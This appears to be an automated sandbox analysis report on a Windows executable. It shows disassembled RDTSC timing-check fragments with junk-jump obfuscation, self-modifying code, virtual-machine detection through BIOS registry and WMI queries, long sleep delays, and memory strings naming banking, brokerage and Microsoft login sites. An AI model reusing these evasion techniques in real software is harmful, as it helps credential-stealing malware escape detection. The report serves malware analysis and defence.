Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360439 second address: 5360465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8E8511F5E4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360465 second address: 5360477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E84B4EF7Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360477 second address: 53604DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F8E8511F5E7h 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 jmp 00007F8E8511F5E4h 0x00000015 pushfd 0x00000016 jmp 00007F8E8511F5E2h 0x0000001b adc cl, 00000068h 0x0000001e jmp 00007F8E8511F5DBh 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov eax, 742156F1h 0x0000002e movzx esi, dx 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 53604DD second address: 53604E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 53604E3 second address: 536052E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d call 00007F8E8511F5DEh 0x00000012 movzx eax, di 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007F8E8511F5DAh 0x0000001e xor esi, 75E93358h 0x00000024 jmp 00007F8E8511F5DBh 0x00000029 popfd 0x0000002a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350D18 second address: 5350D39 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F8E84B4EF7Fh 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov di, 2D26h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350D39 second address: 5350D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350D3E second address: 5350D69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 325Fh 0x00000007 mov edi, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F8E84B4EF7Eh 0x00000013 xchg eax, ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8E84B4EF7Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350D69 second address: 5350D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350D6D second address: 5350D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350D73 second address: 5350D84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E8511F5DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350D84 second address: 5350D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350D88 second address: 5350D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov cx, dx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350D9A second address: 5350DD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F8E84B4EF80h 0x0000000f mov dword ptr [ebp-04h], 55534552h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8E84B4EF7Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350DD4 second address: 5350DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350DD8 second address: 5350DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350DDE second address: 5350DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E8511F5DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350DEF second address: 5350DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350E09 second address: 5350E64 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 31E092C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a leave 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F8E8511F5DFh 0x00000014 jmp 00007F8E8511F5E3h 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F8E8511F5E8h 0x00000020 or ch, 00000008h 0x00000023 jmp 00007F8E8511F5DBh 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350E64 second address: 5350E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350E6A second address: 5350E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5350E6E second address: 53609F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a jmp 00007F8E84B4EF72h 0x0000000c and bl, 00000001h 0x0000000f movzx eax, bl 0x00000012 add esp, 3Ch 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 pop ebp 0x00000019 ret 0x0000001a add esp, 04h 0x0000001d mov eax, dword ptr [00DB3010h+ebx*4] 0x00000024 mov ecx, 3C17A731h 0x00000029 xor ecx, dword ptr [00DB3018h] 0x0000002f add eax, ecx 0x00000031 inc eax 0x00000032 jmp eax 0x00000034 mov eax, dword ptr [00DB301Ch] 0x00000039 mov ecx, EB7ED259h 0x0000003e xor ecx, dword ptr [00DB3024h] 0x00000044 add eax, ecx 0x00000046 inc eax 0x00000047 jmp eax 0x00000049 push edi 0x0000004a call 00007F8E84B7ACA0h 0x0000004f push ebp 0x00000050 push ebx 0x00000051 push edi 0x00000052 push esi 0x00000053 sub esp, 44h 0x00000056 push 00000000h 0x00000058 call 00007F8E89110894h 0x0000005d mov edi, edi 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F8E84B4EF88h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 53609F9 second address: 5360A57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8E8511F5E1h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F8E8511F5E1h 0x0000000f xor cx, 42F6h 0x00000014 jmp 00007F8E8511F5E1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F8E8511F5E8h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360A57 second address: 5360A66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360A66 second address: 5360A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E8511F5E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360A7E second address: 5360AD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F8E84B4EF89h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov edi, eax 0x00000015 mov eax, 07001E7Fh 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d jmp 00007F8E84B4EF82h 0x00000022 cmp dword ptr [76FF459Ch], 05h 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360AD1 second address: 5360ADD instructions: 0x00000000 rdtsc 0x00000002 mov dx, E8FEh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a mov cl, dl 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360ADD second address: 5360B0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a je 00007F8EF677CE85h 0x00000010 pushad 0x00000011 mov bx, si 0x00000014 mov edx, eax 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8E84B4EF7Bh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360B90 second address: 5360BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E8511F5E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360BA8 second address: 5360BEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 14BAD92Bh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F8E84B4EF7Dh 0x00000016 adc si, A366h 0x0000001b jmp 00007F8E84B4EF81h 0x00000020 popfd 0x00000021 movzx ecx, di 0x00000024 popad 0x00000025 call 00007F8EF6783F07h 0x0000002a push 76F92B70h 0x0000002f push dword ptr fs:[00000000h] 0x00000036 mov eax, dword ptr [esp+10h] 0x0000003a mov dword ptr [esp+10h], ebp 0x0000003e lea ebp, dword ptr [esp+10h] 0x00000042 sub esp, eax 0x00000044 push ebx 0x00000045 push esi 0x00000046 push edi 0x00000047 mov eax, dword ptr [76FF4538h] 0x0000004c xor dword ptr [ebp-04h], eax 0x0000004f xor eax, ebp 0x00000051 push eax 0x00000052 mov dword ptr [ebp-18h], esp 0x00000055 push dword ptr [ebp-08h] 0x00000058 mov eax, dword ptr [ebp-04h] 0x0000005b mov dword ptr [ebp-04h], FFFFFFFEh 0x00000062 mov dword ptr [ebp-08h], eax 0x00000065 lea eax, dword ptr [ebp-10h] 0x00000068 mov dword ptr fs:[00000000h], eax 0x0000006e ret 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 mov esi, 5A0138ABh 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360BEF second address: 5360C36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 mov di, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esi, esi 0x0000000d pushad 0x0000000e call 00007F8E8511F5E7h 0x00000013 movzx eax, di 0x00000016 pop ebx 0x00000017 mov ecx, 23E8E0F1h 0x0000001c popad 0x0000001d mov dword ptr [ebp-1Ch], esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F8E8511F5E3h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360C8C second address: 5360CBA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8E84B4EF7Dh 0x00000008 and al, FFFFFFA6h 0x0000000b jmp 00007F8E84B4EF81h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 mov esi, 24A79EADh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370C4B second address: 5370C51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370C51 second address: 5370C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370C57 second address: 5370C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370C5B second address: 5370C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8E84B4EF81h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov eax, 7EE3DF13h 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007F8E84B4EF82h 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370C9B second address: 5370C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370C9F second address: 5370CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370CBC second address: 5370CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370CC2 second address: 5370CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370CC6 second address: 5370D23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F8E8511F5E9h 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 mov bx, cx 0x00000016 mov dx, si 0x00000019 popad 0x0000001a mov esi, dword ptr [ebp+0Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F8E8511F5DAh 0x00000026 add ch, FFFFFFE8h 0x00000029 jmp 00007F8E8511F5DBh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370D23 second address: 5370D5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F8E84B4EF7Eh 0x00000010 je 00007F8EF676C5DDh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370D5C second address: 5370D62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370D62 second address: 5370DA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [76FF459Ch], 05h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F8E84B4EF7Eh 0x00000017 or ah, 00000008h 0x0000001a jmp 00007F8E84B4EF7Bh 0x0000001f popfd 0x00000020 push eax 0x00000021 push edx 0x00000022 mov eax, 547C7995h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370DA7 second address: 5370DDF instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007F8EF6D54CBEh 0x0000000e jmp 00007F8E8511F5DDh 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8E8511F5E8h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370DDF second address: 5370DEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370E38 second address: 5370E55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370E55 second address: 5370EBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 6032h 0x00000007 pushfd 0x00000008 jmp 00007F8E84B4EF83h 0x0000000d adc cx, 122Eh 0x00000012 jmp 00007F8E84B4EF89h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, esi 0x0000001c pushad 0x0000001d mov al, E5h 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 movsx edi, cx 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007F8E84B4EF87h 0x0000002d xchg eax, esi 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370EBD second address: 5370ED8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370F13 second address: 5370F19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370F19 second address: 5370F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370F1F second address: 5370F5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007F8E84B4EF80h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8E84B4EF87h 0x00000019 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\FvbuInU.exe	Special instruction interceptor: First address: DC59F6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\FvbuInU.exe	Special instruction interceptor: First address: F6197A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\FvbuInU.exe	Special instruction interceptor: First address: DC5923 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\FvbuInU.exe	Special instruction interceptor: First address: FF0923 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\FvbuInU.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\FvbuInU.exe

Code function: 0_2_00DC90A0 rdtsc

0_2_00DC90A0

Source: C:\Users\user\Desktop\FvbuInU.exe	Window / User API: threadDelayed 1237	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Window / User API: threadDelayed 1488	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Window / User API: threadDelayed 1398	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Window / User API: threadDelayed 1414	Jump to behavior

Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7628	Thread sleep count: 77 > 30	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7628	Thread sleep time: -154077s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7612	Thread sleep count: 1237 > 30	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7612	Thread sleep time: -2475237s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7704	Thread sleep time: -44000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7600	Thread sleep count: 1488 > 30	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7600	Thread sleep time: -2977488s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7708	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7620	Thread sleep count: 1398 > 30	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7620	Thread sleep time: -2797398s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7608	Thread sleep count: 1414 > 30	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe TID: 7608	Thread sleep time: -2829414s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\FvbuInU.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: FvbuInU.exe, FvbuInU.exe, 00000000.00000002.1967709677.0000000000F44000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: FvbuInU.exe, 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1771684448.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000002.1968657019.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967345625.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000002.1968513015.0000000001537000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967231255.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1853538978.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967004894.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967004894.0000000001537000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
